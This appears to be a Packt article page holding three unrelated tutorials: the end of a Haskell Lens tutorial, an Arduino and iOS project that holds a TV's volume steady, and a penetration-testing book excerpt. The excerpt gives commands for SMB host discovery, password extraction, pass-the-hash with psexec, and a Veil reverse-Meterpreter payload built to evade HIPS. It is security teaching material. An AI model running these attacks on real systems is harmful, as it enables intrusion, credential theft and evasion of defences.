As root is a lens, the Lens library gives us the following:

    -- import Control.Lens
    main = do
      -- GET
      print $ view root listTree
      print $ view root intTree
      -- SET
      print $ set root [42] listTree
      print $ set root 42 intTree
      -- FMAP
      print $ over root (+11) intTree

The over function is the lens way of fmap'ing a function into a Functor.

Composable getters and setters

Another Lens on Tree might be to focus on the rightmost leaf:

    rightMost :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a)
    rightMost g (Node z l r) = fmap (\r' -> Node z l r') (rightMost g r)
    rightMost g (Leaf z) = fmap (\x -> Leaf x) (g z)

The Lens library provides several lenses for Tuple (for example, _1, which brings focus to the first Tuple element). We can compose our rightMost lens with the Tuple lenses:

    main = do
      print $ view rightMost tupleTree
      print $ set rightMost (0,0) tupleTree
      -- Compose Getters and Setters
      print $ view (rightMost._1) tupleTree
      print $ set (rightMost._1) 0 tupleTree
      print $ over (rightMost._1) (*100) tupleTree

A Lens can serve as a getter, setter, or "function setter". We are composing lenses using regular function composition (.)! Note that the order of composition is reversed: in (rightMost._1), the rightMost lens is applied before the _1 lens.

Lens Traversal

A Lens focuses on one part of a data structure, not several. For example, a lens cannot focus on all the leaves of a Tree:

    set leaves 0 intTree
    over leaves (+1) intTree

To focus on more than one part of a structure, we need a Traversal (the Lens generalization of Traversable).
Whereas Lens relies on Functor, Traversal relies on Applicative. Other than this, the signatures are exactly the same:

    traversal :: Applicative f' => (a -> f' a) -> Tree a -> f' (Tree a)
    lens      :: Functor f'     => (a -> f' a) -> Tree a -> f' (Tree a)

A leaves Traversal delivers the setter function to all the leaves of the Tree:

    leaves :: Applicative f' => (a -> f' a) -> Tree a -> f' (Tree a)
    leaves g (Node z l r) = Node z <$> leaves g l <*> leaves g r
    leaves g (Leaf z) = Leaf <$> (g z)

We can use the set and over functions with our new Traversal:

    set leaves 0 intTree
    over leaves (+1) intTree

Traversals compose seamlessly with Lenses:

    main = do
      -- Compose Traversal + Lens
      print $ over (leaves._1) (*100) tupleTree
      -- Compose Traversal + Traversal
      print $ over (leaves.both) (*100) tupleTree
      -- map over each elem in target container (e.g. list)
      print $ over (leaves.mapped) (*(-1)) listTree
      -- Traversal with effects
      mapMOf leaves displayM tupleTree

(Here, both is a Tuple Traversal that focuses on both elements.)

Lens.Fold

The Lens.Traversal lifts Traversable into the realm of lenses, while Lens.Fold does the same for Foldable:

    main = do
      print $ sumOf leaves intTree
      print $ anyOf leaves (>0) intTree

The Lens Library

We have used only "simple" Lenses so far. A fully parametrized Lens allows for replacing parts of a data structure with different types:

    -- the quantified f' requires the RankNTypes extension
    type Lens s t a b = forall f'. Functor f' => (a -> f' b) -> s -> f' t
    -- vs simple Lens
    type Lens' s a = Lens s s a a

Lens library function names do their best to not clash with existing names, for example, by postfixing idiomatic function names with "Of" (sumOf, mapMOf, and so on), or by using different verb forms such as "droppingWhile" instead of "dropWhile". While this creates a burden, as one has to learn new variations, it does have a big plus point: it allows for easy unqualified import of the Lens library.

By leaving the Lens function type transparent (and not obfuscating it with a new type), we get Traversals by simply swapping out Functor for Applicative.
We also get to define lenses without having to reference the Lens library. On the downside, Lens type signatures can be bewildering at first sight. They form a language of their own that requires effort to get used to, for example:

    mapMOf :: Profunctor p => Over p (WrappedMonad m) s t a b -> p a (m b) -> s -> m t
    foldMapOf :: Profunctor p => Accessing p r s a -> p a r -> s -> r

On the surface, the Lens library gives us composable getters and setters, but there is much more to Lenses than that. By generalizing Foldable and Traversable into Lens abstractions, the Lens library lifts Getters, Setters, Lenses, and Traversals into a unified framework in which they all compose together.

Edward Kmett's Lens library is a sprawling masterpiece that is sure to leave a lasting impact on idiomatic Haskell.

Summary

We started with lists (Haskell 98) and then generalized to all Traversable containers (introduced in the mid-2000s). Following that, we saw how the Lens library (2012) places traversing in an even broader context. Lenses give us a unified vocabulary to navigate data structures, which explains why the library has been described as a "query language for data structures".

Resources for Article:

Further resources on this subject:
Plotting in Haskell [article]
The Hunt for Data [article]
Getting started with Haskell [article]


Packt

25 Sep 2015

19 min read

TV Set Constant Volume Controller

In this article by Fabrizio Boco, author of Arduino iOS Blueprints, we learn how to control a TV set's volume using Arduino and iOS.

I don't watch TV much, but when I do, I usually completely relax and fall asleep. I know that TV is not meant for putting you to sleep, but it does this to me. Unfortunately, commercials are transmitted at a very high volume and they wake me up. How can I relax if commercials wake me up every five minutes? Can you believe it? During one of my naps between two commercials, I came up with a solution based on iOS and Arduino.

It's nothing complex. An iOS device listens to the TV set's audio, and when the audio level becomes higher than a preset threshold, the iOS device sends a message (via Bluetooth) to Arduino, which controls the TV set volume, emulating the traditional IR remote control. Exactly the same happens when the volume drops below another threshold. The final result is that the TV set volume is almost constant, independent of what is on the air. This helps me sleep longer!

The techniques that you are going to learn in this article are useful in many different ways. You can use an IR remote control for any purpose, or you can control many different devices, such as a CD/DVD player, a stereo set, Apple TV, a projector, and so on, directly from an Arduino and iOS device. As always, it is up to your imagination.

Constant Volume Controller requirements

Our aim is to design an Arduino-based device that can make the TV set's volume almost constant by emulating the traditional remote controller, and an iOS application that monitors the TV and decides when to decrease or increase the TV set's volume.

Hardware

Most TV sets can be controlled by an IR remote controller, which sends signals to control the volume, change the channel, and control all the other TV set functions.
IR remote controllers use a carrier signal (usually at 38 kHz) that is easy to isolate from noise and disturbances. The carrier signal is turned on and off by following different rules (encoding) in order to transmit the 0 and 1 digital values. The IR receiver removes the carrier signal (with a low-pass filter) and decodes the remaining signal by returning a clear sequence of 0s and 1s.

The IR remote control theory

You can find more information about the IR remote control at http://bit.ly/1UjhsIY.

Our circuit will emulate the IR remote controller by using an IR LED, which will send specific signals that can be interpreted by our TV set. On the other hand, we can receive an IR signal with a phototransistor and decode it into an understandable sequence of numbers by designing a demodulator and a decoder. Nowadays, electronics is very simple; an IR receiver module (Vishay TSOP 4838) will manage the complexity of signal demodulation, noise cancellation, triggering, and decoding. It can be directly connected to Arduino, making everything very easy. In the project in this article, we need an IR receiver to discover the coding rules that are used by our own IR remote controller (and the TV set).

Additional electronic components

In this project, we need the following additional components:

IR LED Vishay TSAL6100
IR Receiver module Vishay TSOP 4838
Resistor 100Ω
Resistor 680Ω
Electrolytic capacitor 0.1μF

Electronic circuit

The following picture shows the electrical diagram of the circuit that we need for the project:

The IR receiver will be used only to capture the TV set's remote controller signals so that our circuit can emulate them. The IR LED, however, is used all the time to send commands to the TV set. The other two LEDs will show when Arduino increases or decreases the volume. They are optional and can be omitted. As usual, the Bluetooth device is used to receive commands from the iOS device.
Powering the IR LED within the current limits of Arduino

From the datasheet of the TSAL6100, we know that the forward voltage is 1.35V. The voltage drop along R1 is then 5 - 1.35 = 3.65V, and the current provided by Arduino to power the LED is about 3.65/680 = 5.4 mA. The maximum current that is allowed for each pin is 40 mA (the recommended value is 20 mA). So, we are within the limits. In case your TV set is far from the LED, you may need to reduce the R1 resistor in order to get more current (and more IR light). Use the new value of R1 in the previous calculations to check whether you are within the Arduino limits. For more information about the Arduino pin current, check out http://bit.ly/1JosGac.

The following diagram shows how to mount the circuit on a breadboard:

Arduino code

The entire code of this project can be downloaded from https://www.packtpub.com/books/content/support. To better understand the explanations in the following paragraphs, open the downloaded code while reading them.

In this project, we are going to use the IR remote library, which helps us code and decode IR signals. The library can be downloaded from http://bit.ly/1Isd8Ay and installed by using the following procedure:

1. Navigate to the release page of http://bit.ly/1Isd8Ay in order to get the latest release and download the IRremote.zip file.
2. Unzip the file wherever you like.
3. Open the Finder and then the Applications folder (Shift + Command + A).
4. Locate the Arduino application.
5. Right-click on it and select Show Package Contents.
6. Locate the Java folder and then libraries.
7. Copy the IRremote folder (unzipped in step 2) into the libraries folder.
8. Restart Arduino if you have it running.
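The R1 check from the start of this section (the LED current for a given resistor, compared against the Arduino pin limits) can be written out as a short calculation. The following is only a minimal sketch in Python, used here for brevity rather than Arduino code; the function names led_current_ma and check_r1 are hypothetical, and the numeric values are the ones quoted in the text (5V supply, 1.35V forward voltage, 20 mA recommended, 40 mA maximum).

```python
# Values quoted in the text; adjust them if your board or LED differs.
SUPPLY_V = 5.0             # Arduino output pin voltage (V)
LED_FORWARD_V = 1.35       # TSAL6100 forward voltage from the datasheet (V)
PIN_RECOMMENDED_MA = 20.0  # recommended current per pin (mA)
PIN_MAX_MA = 40.0          # absolute maximum current per pin (mA)


def led_current_ma(r1_ohms, supply_v=SUPPLY_V, forward_v=LED_FORWARD_V):
    """Current through the IR LED, in mA, for a series resistor R1 (Ohm's law)."""
    if r1_ohms <= 0:
        raise ValueError("R1 must be a positive resistance")
    return (supply_v - forward_v) / r1_ohms * 1000.0


def check_r1(r1_ohms):
    """Return (current in mA, verdict) for a candidate R1 value (hypothetical helper)."""
    current = led_current_ma(r1_ohms)
    if current > PIN_MAX_MA:
        verdict = "over the absolute maximum"
    elif current > PIN_RECOMMENDED_MA:
        verdict = "above the recommended value"
    else:
        verdict = "within the recommended limit"
    return current, verdict


if __name__ == "__main__":
    # 680 ohms is the value used in the circuit; the others are illustrative.
    for r1 in (680, 330, 220, 100):
        current, verdict = check_r1(r1)
        print(f"R1 = {r1} ohm: {current:.1f} mA ({verdict})")
```

Running the same check with a smaller R1 shows how quickly the current approaches the recommended 20 mA, which is the reason for repeating the calculation before swapping the resistor.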
In this project, we need the following two Arduino programs:

One is used to acquire the codes that your IR remote controller sends to increase and decrease the volume
The other is the main program that Arduino has to run to automatically control the TV set volume

Let's start with the code that is used to acquire the IR remote controller codes.

Decoder setup code

In this section, we will be referring to the downloaded Decode.ino program that is used to discover the codes that are used by your remote controller. Since the setup code is quite simple, it doesn't require a detailed explanation; it just initializes the library to receive and decode messages.

Decoder main program

In this section, we will be referring to the downloaded Decode.ino program; the main code receives signals from the TV remote controller and dumps the appropriate code, which will be included in the main program to emulate the remote controller itself. Once the program is run, if you press any button on the remote controller, the console will show the following:

    For IR Scope:
    +4500 -4350 …

    For Arduino sketch:
    unsigned int raw[68] = {4500,4350,600,1650,600,1600,600,1600,…};

The second row is what we need. Please refer to the Testing and tuning section for a detailed description of how to use this data. Now, we will take a look at the main code that will be running on Arduino all the time.

Setup code

In this section, we will be referring to the Arduino_VolumeController.ino program. The setup function initializes the nRF8001 board and configures the pins for the optional monitoring LEDs.

Main program

The loop function just calls the pollACI function to allow the correct management of incoming messages from the nRF8001 board.
The program accepts the following two messages from the iOS device (refer to the rxCallback function):

D to decrease the volume
I to increase the volume

The following two functions perform the actual increasing and decreasing of volume by sending the two up and down buffers through the IR LED:

    void volumeUp() {
      irsend.sendRaw(up, VOLUME_UP_BUFFER_LEN, 38);
      delay(20);
    }

    void volumeDown() {
      irsend.sendRaw(down, VOLUME_DOWN_BUFFER_LEN, 38);
      delay(20);
      irsend.sendRaw(down, VOLUME_DOWN_BUFFER_LEN, 38);
      delay(20);
    }

The up and down buffers, together with their lengths VOLUME_UP_BUFFER_LEN and VOLUME_DOWN_BUFFER_LEN, are prepared with the help of the Decode.ino program (see the Testing and tuning section).

iOS code

In this article, we are going to look at the iOS application that monitors the TV set volume and sends the volume down or volume up commands to the Arduino board in order to maintain the volume at the desired value.

The full code of this project can be downloaded from https://www.packtpub.com/books/content/support. To better understand the explanations in the following paragraphs, open the downloaded code while reading them.

Create the Xcode project

We will create a new project as we already did previously. The following are the parameters for the new project:

Project Type: Tabbed application
Product Name: VolumeController
Language: Objective-C
Devices: Universal

To set a capability for this project, perform the following steps:

1. Select the project in the left pane of Xcode.
2. Select Capabilities in the right pane.
3. Turn on the Background Modes option and select Audio and AirPlay (refer to the following picture).
This allows an iOS device to keep listening to audio signals even when the device screen goes off or the app goes into the background:

Since the structure of this project is very close to the Pet Door Locker, we can reuse a part of the user interface and the code by performing the following steps:

1. Select FirstViewController.h and FirstViewController.m, right-click on them, click on Delete, and select Move to Trash.
2. With the same procedure, delete SecondViewController and Main.storyboard.
3. Open the PetDoorLocker project in Xcode.
4. Select the following files and drag and drop them to this project (refer to the following picture): BLEConnectionViewController.h, BLEConnectionViewController.m, and Main.storyboard. Ensure that Copy items if needed is selected and then click on Finish.
5. Copy the icon that was used for the BLEConnectionViewController view controller.
6. Create a new View Controller class and name it VolumeControllerViewController.
7. Open the Main.storyboard and locate the main View Controller.
8. Delete all the graphical components.
9. Open the Identity Inspector and change the Class to VolumeControllerViewController.

Now, we are ready to create what we need for the new application.
Design the user interface for VolumeControllerViewController This view controller is the main view controller of the application and contains just the following components: The switch that turns on and off the volume control The slider that sets the desired volume of the TV set Once you have added the components and their layout constraints, you will end up with something that looks like the following screenshot: Once the GUI components are linked with the code of the view controller, we end with the following code: @interface VolumeControllerViewController () @property (strong, nonatomic) IBOutlet UISlider *volumeSlider; @end and with: - (IBAction)switchChanged:(UISwitch *)sender { … } - (IBAction)volumeChanged:(UISlider *)sender { … } Writing code for BLEConnectionViewController Since we copied this View Controller from the Pet Door Locker project, we don't need to change it apart from replacing the key, which was used to store the peripheral UUID, from PetDoorLockerDevice to VolumeControllerDevice. We saved some work! Now, we are ready to work on the VolumeControllerViewController, which is much more interesting. Writing code for VolumeControllerViewController This is the main part of the application; almost everything happens here. We need some properties, as follows: @interface VolumeControllerViewController () @property (strong, nonatomic) IBOutlet UISlider *volumeSlider; @property (strong, nonatomic) CBCentralManager *centralManager; @property (strong, nonatomic) CBPeripheral *arduinoDevice; @property (strong, nonatomic) CBCharacteristic *sendCharacteristic; @property (nonatomic,strong) AVAudioEngine *audioEngine; @property float actualVolumeDb; @property float desiredVolumeDb; @property float desiredVolumeMinDb; @property float desiredVolumeMaxDb; @property NSUInteger increaseVolumeDelay; @end Some are used to manage the Bluetooth communication and don't need much explanation. 
The audioEngine is the instance of AVAudioEngine, which allows us to transform the audio signal captured by the iOS device microphone into numeric samples. By analyzing these samples, we can obtain the power of the signal, which is directly related to the TV set's volume (the higher the volume, the greater the signal power).

Analog-to-digital conversion
The operation of transforming an analog signal into a digital sequence of numbers, which represent the amplitude of the signal itself at different times, is called analog-to-digital conversion. Arduino analog inputs perform exactly the same operation. Together with digital-to-analog conversion, it is a basic operation of digital signal processing, and it is what makes it possible to store music on our devices and play it back with reasonable quality. For more details, visit http://bit.ly/1N1QyXp.

The actualVolumeDb property stores the actual volume of the signal measured in dB (short for decibel).

Decibel (dB)
The decibel (dB) is a logarithmic unit that expresses the ratio between two values of a physical quantity. Referring to the power of a signal, its value in decibels is calculated with the following formula:

$P_{dB} = 10 \log_{10}\left(\frac{P}{P_0}\right)$

Here, $P$ is the power of the signal and $P_0$ is a reference power. You can find out more about the decibel at http://bit.ly/1LZQM0m.

We have to point out that if $P < P_0$, the value of $P_{dB}$ is lower than zero. So, decibel values are usually negative, and 0 dB indicates the maximum power of the signal. The desiredVolumeDb property stores the desired volume measured in dB, and the user controls this value through the volume slider in the main tab of the app; desiredVolumeMinDb and desiredVolumeMaxDb are derived from desiredVolumeDb. The most significant part of the code is in the viewDidLoad method (refer to the downloaded code).
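The decibel definition above can be checked with a few lines of Python. This is only a minimal sketch for experimenting with the numbers: the function name power_to_db and the default reference power of 1.0 are assumptions made for the illustration and do not come from the project code.

```python
import math


def power_to_db(power, reference_power=1.0):
    """Return the power ratio expressed in decibels: 10 * log10(P / P0)."""
    if power <= 0 or reference_power <= 0:
        raise ValueError("power and reference_power must be positive")
    return 10.0 * math.log10(power / reference_power)


# A signal at the reference power sits at 0 dB; weaker signals are negative.
full_scale_db = power_to_db(1.0)
tenth_db = power_to_db(0.1)
half_db = power_to_db(0.5)
print(full_scale_db, tenth_db, half_db)
```

A power equal to one tenth of the reference comes out at -10 dB, which is why the values handled by the app are negative whenever the measured power is below the reference.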
First, we instantiate the AVAudioEngine and get the default input node, which is the microphone, as follows:

    _audioEngine = [[AVAudioEngine alloc] init];
    AVAudioInputNode *input = [_audioEngine inputNode];

The AVAudioEngine is a very powerful class, which allows digital audio signal processing. We are just going to scratch the surface of its capabilities.

AVAudioEngine
You can find out more about AVAudioEngine by visiting http://apple.co/1kExe35 (AVAudioEngine in practice) and http://apple.co/1WYG6Tp.

The AVAudioEngine and other functions that we are going to use require that we add the following imports:

    #import <AVFoundation/AVFoundation.h>
    #import <Accelerate/Accelerate.h>

By installing an audio tap on the bus for our input node, we can get the numeric representation of the signal that the iOS device is listening to, as follows:

    [input installTapOnBus:0 bufferSize:8192 format:[input inputFormatForBus:0] block:^(AVAudioPCMBuffer* buffer, AVAudioTime* when) {
        … …
    }];

As soon as a new buffer of data is available, the code block is called and the data can be processed.
Now, we can take a look at the code that transforms the audio data samples into actual commands to control the TV set:

    for (UInt32 i = 0; i < buffer.audioBufferList->mNumberBuffers; i++) {
        Float32 *data = buffer.audioBufferList->mBuffers[i].mData;
        UInt32 numFrames = buffer.audioBufferList->mBuffers[i].mDataByteSize / sizeof(Float32);
        // Squares all the data values
        vDSP_vsq(data, 1, data, 1, numFrames*buffer.audioBufferList->mNumberBuffers);
        // Mean value of the squared data values: power of the signal
        float meanVal = 0.0;
        vDSP_meanv(data, 1, &meanVal, numFrames*buffer.audioBufferList->mNumberBuffers);
        // Signal power in Decibel
        float meanValDb = 10 * log10(meanVal);
        // Smooth the measurement: move 20% of the way toward the new value
        _actualVolumeDb = _actualVolumeDb + 0.2*(meanValDb - _actualVolumeDb);
        if (fabsf(_actualVolumeDb) < _desiredVolumeMinDb && _centralManager.state == CBCentralManagerStatePoweredOn && _sendCharacteristic != nil) {
            //printf("Decrease volume\n");
            NSData* data=[@"D" dataUsingEncoding:NSUTF8StringEncoding];
            [_arduinoDevice writeValue:data forCharacteristic:_sendCharacteristic type:CBCharacteristicWriteWithoutResponse];
            _increaseVolumeDelay = 0;
        }
        if (fabsf(_actualVolumeDb) > _desiredVolumeMaxDb && _centralManager.state == CBCentralManagerStatePoweredOn && _sendCharacteristic != nil) {
            _increaseVolumeDelay++;
        }
        if (_increaseVolumeDelay > 10) {
            //printf("Increase volume\n");
            _increaseVolumeDelay = 0;
            NSData* data=[@"I" dataUsingEncoding:NSUTF8StringEncoding];
            [_arduinoDevice writeValue:data forCharacteristic:_sendCharacteristic type:CBCharacteristicWriteWithoutResponse];
        }
    }

In our case, the for loop is executed just once because we have just one buffer and we are using only one channel. The power of a signal, represented by N samples, can be calculated by using the following formula:

$P = \frac{1}{N} \sum_{n=1}^{N} v_n^2$

Here, $v_n$ is the value of the nth signal sample.
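The power calculation and the smoothing step described above can be tried out away from the device. The following is a plain Python sketch, not the vDSP-based code of the project: the function names, the sample values, and the default smoothing factor argument are assumptions chosen for the illustration (the factor 0.2 mirrors the one used in the listing).

```python
import math


def mean_square_power(samples):
    """Mean of the squared samples: the power of the signal."""
    return sum(v * v for v in samples) / len(samples)


def smooth(previous_db, measured_db, alpha=0.2):
    """Move a fraction alpha of the way from the previous value to the new one."""
    return previous_db + alpha * (measured_db - previous_db)


# Four illustrative samples of a square wave with amplitude 0.5.
samples = [0.5, -0.5, 0.5, -0.5]
power = mean_square_power(samples)
power_db = 10 * math.log10(power)
smoothed_db = smooth(0.0, power_db)
print(power, power_db, smoothed_db)
```

Note that a buffer of pure silence has a power of zero, for which the logarithm is undefined, so a real implementation would probably want to guard against that case before converting to decibels.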
Because the power calculation has to be performed in real time, we are going to use the following functions, which are provided by the Accelerate framework: vDSP_vsq: This function calculates the square of each input vector element. vDSP_meanv: This function calculates the mean value of the input vector elements.

The Accelerate framework
The Accelerate framework is an essential tool for digital signal processing. It saves you the time of implementing the most commonly used algorithms and provides implementations that are optimized in terms of memory footprint and performance. More information on the Accelerate framework can be found at http://apple.co/1PYIKE8 and http://apple.co/1JCJWYh.

Eventually, the signal power is stored in _actualVolumeDb. When the modulus of _actualVolumeDb is lower than _desiredVolumeMinDb, the TV set's volume is too high, and we need to send a message to Arduino to reduce it. Don't forget that _actualVolumeDb is a negative number; its modulus decreases when the TV set's volume increases. Conversely, when the TV set's volume decreases, the _actualVolumeDb modulus increases, and when it gets higher than _desiredVolumeMaxDb, we need to send a message to Arduino to increase the TV set's volume. During pauses in dialogues, the power of the signal tends to decrease even if the volume of the speech is not changed. Without any adjustment, the increasing and decreasing messages would be continuously sent to the TV set during dialogues. To avoid this misbehavior, we send the volume increase message only after the signal power has stayed beyond the threshold for some time (when _increaseVolumeDelay is greater than 10). We can now take a look at the other view controller methods, which are not complex.
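The decision logic described above (decrease immediately, increase only after the signal has stayed quiet for a while) can be modeled in a few lines. This is a hedged Python sketch of that logic only: the class name VolumeRegulator, the method step, and the threshold values 17 and 22 are hypothetical and chosen for the illustration; the letters "D" and "I" are the messages that the article sends to Arduino.

```python
class VolumeRegulator:
    """Toy model of the threshold logic with a delayed volume increase."""

    def __init__(self, min_db, max_db, delay_limit=10):
        self.min_db = min_db
        self.max_db = max_db
        self.delay_limit = delay_limit
        self.increase_delay = 0

    def step(self, actual_db):
        """Return "D", "I", or None for one smoothed measurement in dB."""
        level = abs(actual_db)
        if level < self.min_db:
            # Too loud: ask for a decrease right away and reset the counter.
            self.increase_delay = 0
            return "D"
        if level > self.max_db:
            # Too quiet: only count, do not react to a single quiet buffer.
            self.increase_delay += 1
        if self.increase_delay > self.delay_limit:
            self.increase_delay = 0
            return "I"
        return None


regulator = VolumeRegulator(min_db=17.0, max_db=22.0)
loud = regulator.step(-10.0)
quiet = [regulator.step(-30.0) for _ in range(11)]
print(loud, quiet)
```

With these values, a loud buffer triggers a decrease at once, while the increase message only appears on the eleventh consecutive quiet buffer, which is the behavior that keeps short pauses in dialogue from raising the volume.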
When the view belonging to the view controller appears, the following method is called:

    -(void)viewDidAppear:(BOOL)animated {
        [super viewDidAppear:animated];
        NSError* error = nil;
        [self connect];
        _actualVolumeDb = 0;
        [_audioEngine startAndReturnError:&error];
        if (error) {
            NSLog(@"Error %@",[error description]);
        }
    }

In this function, we connect to the Arduino board and start the audio engine in order to start listening to the TV set. When the view disappears from the screen, the viewDidDisappear method is called, and we disconnect from the Arduino and pause the audio engine, as follows:

    -(void)viewDidDisappear:(BOOL)animated {
        // Call the superclass implementation (calling self here would recurse forever)
        [super viewDidDisappear:animated];
        [self disconnect];
        [_audioEngine pause];
    }

The method that is called when the switch is operated (switchChanged) is pretty simple:

    - (IBAction)switchChanged:(UISwitch *)sender {
        NSError* error = nil;
        if (sender.on) {
            [_audioEngine startAndReturnError:&error];
            if (error) {
                NSLog(@"Error %@",[error description]);
            }
            _volumeSlider.enabled = YES;
        }
        else {
            [_audioEngine stop];
            _volumeSlider.enabled = NO;
        }
    }

The method that is called when the volume slider changes is as follows:

    - (IBAction)volumeChanged:(UISlider *)sender {
        _desiredVolumeDb = 50.*(1-sender.value);
        _desiredVolumeMaxDb = _desiredVolumeDb + 2;
        _desiredVolumeMinDb = _desiredVolumeDb - 3;
    }

We just set the desired volume and the lower and upper thresholds. The other methods that are used to manage the Bluetooth connection and data transfer don't require any explanation, because they are exactly like those in the previous projects.

Testing and tuning
We are now ready to test our new amazing system and spend more and more time watching TV (or taking more and more naps!). Let's perform the following procedure: Load the Decoder.ino sketch and open the Arduino IDE console. Point your TV remote controller to the TSOP4838 receiver and press the button that increases the volume.
You should see something like the following appearing on the console: For IR Scope: +4500 -4350 … For Arduino sketch: unsigned int raw[68] = {4500,4350,600,1650,600,1600,600,1600,…}; Copy all the values between the curly braces. Open the Arduino_VolumeController.ino and paste the values for the following: unsigned int up[68] = {9000, 4450, …..,}; Check whether the length of the two vectors (68 in the example) is the same and modify it, if needed. Point your TV remote controller to the TSOP4838 receiver and press the button that decreases the volume. Copy the values and paste them for: unsigned int down[68] = {9000, 4400, ….,}; Check whether the length of the two vectors (68 in the example) is the same and modify it, if needed. Upload the Arduino_VolumeController.ino to Arduino and point the IR LED towards the TV set. Open the iOS application, scan for the nRF8001, and then go to the main tab. Tap on connect and then set the desired volume by touching the slider. Now, you should see the blue LED and the green LED flashing. The TV set's volume should stabilize to the desired value. To check whether everything is properly working, increase the volume of the TV set by using the remote control; you should immediately see the blue LED flashing and the volume getting lower to the preset value. Similarly, by decreasing the volume with the remote control, you should see the green LED flashing and the TV set's volume increasing. Take a nap, and the commercials will not wake you up! How to go further The following are some improvements that can be implemented in this project: Changing channels and controlling other TV set functions. Catching handclaps to turn on or off the TV set. Adding a button to mute the TV set. Muting the TV set on receiving a phone call. Anyway, you can use the IR techniques that you have learned for many other purposes. Take a look at the other functions provided by the IRremote library to learn the other provided options. 
You can find all the available functions in the IRremote.h file that is stored in the IRremote library folder. On the iOS side, try to experiment with AVAudioEngine and the Accelerate framework, which is used to process signals.

Summary
This article focused on an easy but useful project and taught you how to use IR to transmit and receive data to and from Arduino. There are many different applications of the basic circuits and programs that you learned here. On the iOS platform, you learned the very basics of capturing sounds from the device microphone and of DSP (digital signal processing). This allows you to leverage the processing capabilities of the iOS platform to expand your Arduino projects.

Resources for Article: Further resources on this subject: Internet Connected Smart Water Meter [article] Getting Started with Arduino [article] Programmable DC Motor Controller with an LCD [article]


Packt

24 Sep 2015

15 min read

Exploiting Services with Python


In this article by Christopher Duffy, author of the book Learning Python Penetration Testing, we will look at testing for the synchronization of account credentials. One of the big misconceptions today concerns the prevalence of exploitable vulnerabilities. You will still find vulnerabilities that can be exploited by overflowing the stack or heap; they are just significantly less common or more complex to exploit. (For more resources related to this topic, see here.)

Testing for the synchronization of account credentials
With these results, we can determine if any of these credentials are reused in the network. We know there are primarily Windows hosts in the target network, but we need to identify which ones have port 445 open, so that we can then try to determine which accounts might grant us access. To find those hosts, run the following command:

    nmap -sS -vvv -p445 192.168.195.0/24 -oG output

Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled.

    grep 445/open output| cut -d" " -f2 >> smb_hosts

The passwords can be extracted directly from John and written to a password file that can be used for follow-on service attacks.

    john --show unshadowed |cut -d: -f2|grep -v " " > passwords

Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module.
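For readers who prefer to stay in Python, the grep and cut pipeline that builds the smb_hosts file can be approximated as follows. This is a minimal sketch that mirrors the shell command rather than a part of the author's tooling: the function name is hypothetical, and the sample lines are illustrative stand-ins for nmap's greppable (-oG) output, not captured results.

```python
def smb_hosts_from_greppable(lines, port="445"):
    """Return the second space-separated field of every line containing '<port>/open'."""
    marker = "%s/open" % port
    hosts = []
    for line in lines:
        if marker in line:
            fields = line.split(" ")
            if len(fields) > 1:
                hosts.append(fields[1])
    return hosts


# Illustrative lines in the shape of greppable output (assumed, not real results).
sample_output = [
    "Host: 192.168.195.10 ()\tStatus: Up",
    "Host: 192.168.195.10 ()\tPorts: 445/open/tcp//microsoft-ds///",
    "Host: 192.168.195.20 ()\tPorts: 445/closed/tcp//microsoft-ds///",
]
smb_hosts = smb_hosts_from_greppable(sample_output)
print(smb_hosts)
```

Like the grep it imitates, this matches on a plain substring, so it makes no attempt to validate the rest of the line.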
The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag this method of testing for logins. A third module, smb_enumusers, can be used, but it only provides details related to local users, as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to move laterally to. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are also going to use a custom exploit built with Veil, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool to output the results to a log file so that you can go back and review them. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged-in users relevant to the returned account names and that the local administrator account will work on that system.
This means this system is ripe for compromise by a Pass-the-Hash (PtH) attack. The psexec module allows you to pass either the extracted Local Area Network Manager (LM):New Technology LM (NTLM) hash and username combination or just the username and password pair to get access. To begin with, we set up a custom multi/handler to catch the custom exploit we generated with Veil, as shown following. Keep in mind that I used 443 for the local port because it bypasses most HIPS, and that the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms; to see the specific payload you want to use, execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code; keep in mind that this requires specific versions of .NET on the target box to work.

    use cs/meterpreter/rev_tcp
    set LPORT 443
    set LHOST 192.168.195.160
    set use_arya Y
    generate

There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that use native system languages can often be purely stagers. The second part is the stage, which consists of the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, as these are often singles. The output will be an executable that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter.
The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can set up the psexec module to reference the custom payload for execution. Update the psexec module so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom, and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or by running the following command from shell access.

